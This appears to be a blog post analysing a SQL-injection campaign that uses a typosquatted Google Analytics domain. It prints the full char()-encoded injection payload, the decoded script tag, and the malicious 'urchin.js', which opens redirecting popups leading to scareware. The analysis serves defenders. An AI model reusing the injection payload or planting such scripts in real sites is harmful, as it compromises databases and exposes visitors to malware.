google-analytiics.com

Notice the 2 ‘i’ in the domain?

The sql-injection attack comes in the form


set+variable=cast(variable+as+varchar(8000))%2Bcast(

char(060)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(116)%2Bchar(121)%2Bchar(112)%2Bchar(101)%2Bchar(61)%2Bchar(34)%2Bchar(116)%2Bchar(101)%2Bchar(120)%2Bchar(116)%2Bchar(47)%2Bchar(106)%2Bchar(97)%2Bchar(118)%2Bchar(97)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(34)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(34)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(97)%2Bchar(110)%2Bchar(97)%2Bchar(108)%2Bchar(121)%2Bchar(116)%2Bchar(105)%2Bchar(105)%2Bchar(99)%2Bchar(115)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(99)%2Bchar(104)%2Bchar(105)%2Bchar(110)%2Bchar(46)%2Bchar(106)%2Bchar(115)%2Bchar(34)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)%2Bchar(0)+as+varchar(8000))

The string of char() can be easily decoded as

<script src=”http://google-analytiics.com/urchin.js&#8221; type=”text/javascript”></script>

The malicious javascript “urchin.js” is obtained and decoded as follows:

function PopShow3() {
CookieTest=navigator.cookieEnabled;
if(CookieTest)
{
ClickUndercookie = GetCookie('clickunder2');
if (ClickUndercookie == null)
{
var ExpDate = new Date ();
ExpDate.setTime(ExpDate.getTime() + 365 * 24 * 60 * 60 * 1000);
SetCookie('clickunder2','1',ExpDate, "/");
window.open("javascript:location.href='http://best-youtubevideo.com/?pid=422&sid=4fd257';","PopWin3","resizable=1,toolbar=1,location=1,menubar=1,status=1,scrollbars=1'");
window.focus();
}
}
}
function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
document.onmouseup=PopShow3;

The above script opens a popup window from “best-youtubevideo.com” domain, however it is redirected to “scanner-antivirusw1.com”. This leads to scareware that scares people to install the malware.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: